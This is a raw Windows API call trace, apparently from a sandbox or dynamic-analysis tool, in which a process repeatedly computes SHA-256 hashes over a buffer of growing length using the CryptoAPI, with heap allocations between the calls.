	[0153.451] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0153.452] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0153.452] CryptHashData (hHash=0x22b6840, pbData=0x2730580, dwDataLen=0xe00, dwFlags=0x0) returned 1
	[0153.452] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0153.452] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2308e78
	[0153.452] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x2308e78, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2308e78, pdwDataLen=0x128aac) returned 1
	[0153.452] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0153.452] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0153.452] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0153.452] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0153.452] CryptHashData (hHash=0x22b68c0, pbData=0x2730580, dwDataLen=0xe20, dwFlags=0x0) returned 1
	[0153.452] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0153.452] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2308ea0
	[0153.452] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2308ea0, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2308ea0, pdwDataLen=0x128aac) returned 1
	[0153.452] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0153.452] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0153.453] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0153.453] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0153.453] CryptHashData (hHash=0x22b6840, pbData=0x2730580, dwDataLen=0xe40, dwFlags=0x0) returned 1
	[0153.453] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0153.453] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2308ec8
	[0153.453] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x2308ec8, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2308ec8, pdwDataLen=0x128aac) returned 1
	[0153.453] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0153.453] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0153.453] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0153.453] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0153.453] CryptHashData (hHash=0x22b68c0, pbData=0x2730580, dwDataLen=0xe60, dwFlags=0x0) returned 1
	[0153.454] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0153.454] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2308ef0
	[0153.454] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2308ef0, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2308ef0, pdwDataLen=0x128aac) returned 1
	[0153.454] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0153.454] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0153.454] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0153.454] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0153.454] CryptHashData (hHash=0x22b6840, pbData=0x2730580, dwDataLen=0xe80, dwFlags=0x0) returned 1
	[0153.454] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0153.454] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2308f18
	[0153.454] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x2308f18, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2308f18, pdwDataLen=0x128aac) returned 1
	[0153.454] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0153.454] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0153.454] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0153.455] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0153.455] CryptHashData (hHash=0x22b68c0, pbData=0x2730580, dwDataLen=0xea0, dwFlags=0x0) returned 1
	[0153.455] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0153.455] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2308f40
	[0153.455] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2308f40, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2308f40, pdwDataLen=0x128aac) returned 1
	[0153.455] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0153.455] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0153.455] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0153.455] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0153.455] CryptHashData (hHash=0x22b6840, pbData=0x2730580, dwDataLen=0xec0, dwFlags=0x0) returned 1
	[0153.455] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0153.455] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2308f68
	[0153.455] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x2308f68, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2308f68, pdwDataLen=0x128aac) returned 1
	[0153.455] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0153.455] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0153.455] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0153.456] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0153.456] CryptHashData (hHash=0x22b68c0, pbData=0x2730580, dwDataLen=0xee0, dwFlags=0x0) returned 1
	[0153.456] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0153.456] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2308f90
	[0153.456] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2308f90, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2308f90, pdwDataLen=0x128aac) returned 1
	[0153.456] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0153.456] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0153.456] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0153.456] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0153.456] CryptHashData (hHash=0x22b6840, pbData=0x2730580, dwDataLen=0xf00, dwFlags=0x0) returned 1
	[0153.456] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0153.456] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2308fb8
	[0153.456] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x2308fb8, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2308fb8, pdwDataLen=0x128aac) returned 1
	[0153.456] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0153.456] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0153.456] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0153.457] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0153.457] CryptHashData (hHash=0x22b68c0, pbData=0x2730580, dwDataLen=0xf20, dwFlags=0x0) returned 1
	[0153.457] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0153.457] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x211cf8
	[0153.457] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x211cf8, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x211cf8, pdwDataLen=0x128aac) returned 1
	[0153.457] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0153.457] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0153.457] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0153.457] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0153.457] CryptHashData (hHash=0x22b6840, pbData=0x2730580, dwDataLen=0xf40, dwFlags=0x0) returned 1
	[0153.458] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0153.458] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x211b90
	[0153.458] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x211b90, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x211b90, pdwDataLen=0x128aac) returned 1
	[0153.458] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0153.458] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0153.474] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0153.474] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0153.474] CryptHashData (hHash=0x22b68c0, pbData=0x2730580, dwDataLen=0xf60, dwFlags=0x0) returned 1
	[0153.474] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0153.474] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x211c08
	[0153.474] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x211c08, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x211c08, pdwDataLen=0x128aac) returned 1
	[0153.474] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0153.475] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0153.475] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0153.475] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0153.475] CryptHashData (hHash=0x22b6840, pbData=0x2730580, dwDataLen=0xf80, dwFlags=0x0) returned 1
	[0153.475] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0153.475] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2093c0
	[0153.475] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x2093c0, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2093c0, pdwDataLen=0x128aac) returned 1
	[0153.475] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0153.475] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0153.475] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0153.476] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0153.476] CryptHashData (hHash=0x22b68c0, pbData=0x2730580, dwDataLen=0xfa0, dwFlags=0x0) returned 1
	[0153.476] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0153.476] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2093e8
	[0153.476] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2093e8, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2093e8, pdwDataLen=0x128aac) returned 1
	[0153.476] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0153.476] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0153.476] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0153.476] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0153.476] CryptHashData (hHash=0x22b6840, pbData=0x2730580, dwDataLen=0xfc0, dwFlags=0x0) returned 1
	[0153.476] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0153.476] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fdf00
	[0153.476] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x22fdf00, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x22fdf00, pdwDataLen=0x128aac) returned 1
	[0153.476] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0153.476] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0153.476] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0153.477] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0153.477] CryptHashData (hHash=0x22b68c0, pbData=0x2730580, dwDataLen=0xfe0, dwFlags=0x0) returned 1
	[0153.477] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0153.477] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2305000
	[0153.477] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2305000, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2305000, pdwDataLen=0x128aac) returned 1
	[0153.477] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0153.477] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0153.477] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0153.477] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0153.477] CryptHashData (hHash=0x22b6840, pbData=0x2730580, dwDataLen=0x1000, dwFlags=0x0) returned 1
	[0153.477] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0153.477] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2305028
	[0153.477] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x2305028, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2305028, pdwDataLen=0x128aac) returned 1
	[0153.477] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0153.477] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0153.477] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2730580) returned 1
	[0153.477] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x1000) returned 0x2730580
	[0153.478] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0153.478] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0153.478] CryptHashData (hHash=0x22b68c0, pbData=0x2730580, dwDataLen=0x20, dwFlags=0x0) returned 1
	[0153.478] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0153.478] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2305050
	[0153.478] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2305050, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2305050, pdwDataLen=0x128aac) returned 1
	[0153.478] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0153.478] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0153.478] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0153.478] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0153.478] CryptHashData (hHash=0x22b6840, pbData=0x2730580, dwDataLen=0x40, dwFlags=0x0) returned 1
	[0153.478] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0153.479] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2305078
	[0153.479] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x2305078, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2305078, pdwDataLen=0x128aac) returned 1
	[0153.479] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0153.479] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0153.479] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0153.479] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0153.479] CryptHashData (hHash=0x22b68c0, pbData=0x2730580, dwDataLen=0x60, dwFlags=0x0) returned 1
	[0153.479] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0153.479] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23050a0
	[0153.479] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x23050a0, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x23050a0, pdwDataLen=0x128aac) returned 1
	[0153.479] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0153.479] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0153.479] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0153.480] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0153.480] CryptHashData (hHash=0x22b6840, pbData=0x2730580, dwDataLen=0x80, dwFlags=0x0) returned 1
	[0153.480] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0153.480] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23050c8
	[0153.480] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x23050c8, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x23050c8, pdwDataLen=0x128aac) returned 1
	[0153.480] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0153.480] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0153.480] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0153.480] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0153.480] CryptHashData (hHash=0x22b68c0, pbData=0x2730580, dwDataLen=0xa0, dwFlags=0x0) returned 1
	[0153.480] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0153.480] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23050f0
	[0153.480] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x23050f0, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x23050f0, pdwDataLen=0x128aac) returned 1
	[0153.480] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0153.480] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0153.480] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0153.481] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0153.481] CryptHashData (hHash=0x22b6840, pbData=0x2730580, dwDataLen=0xc0, dwFlags=0x0) returned 1
	[0153.481] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0153.481] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2305118
	[0153.481] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x2305118, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2305118, pdwDataLen=0x128aac) returned 1
	[0153.481] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0153.481] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0153.481] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0153.481] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0153.481] CryptHashData (hHash=0x22b68c0, pbData=0x2730580, dwDataLen=0xe0, dwFlags=0x0) returned 1
	[0153.481] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0153.481] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2305140
	[0153.481] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2305140, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2305140, pdwDataLen=0x128aac) returned 1
	[0153.481] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0153.481] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0153.481] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
	[0153.482] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0153.482] CryptHashData (hHash=0x22b6840, pbData=0x2730580, dwDataLen=0x100, dwFlags=0x0) returned 1
	[0153.482] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0153.482] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2305168
	[0153.482] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x2305168, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x2305168, pdwDataLen=0x128aac) returned 1
	[0153.482] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0153.482] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0153.482] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225390) returned 1
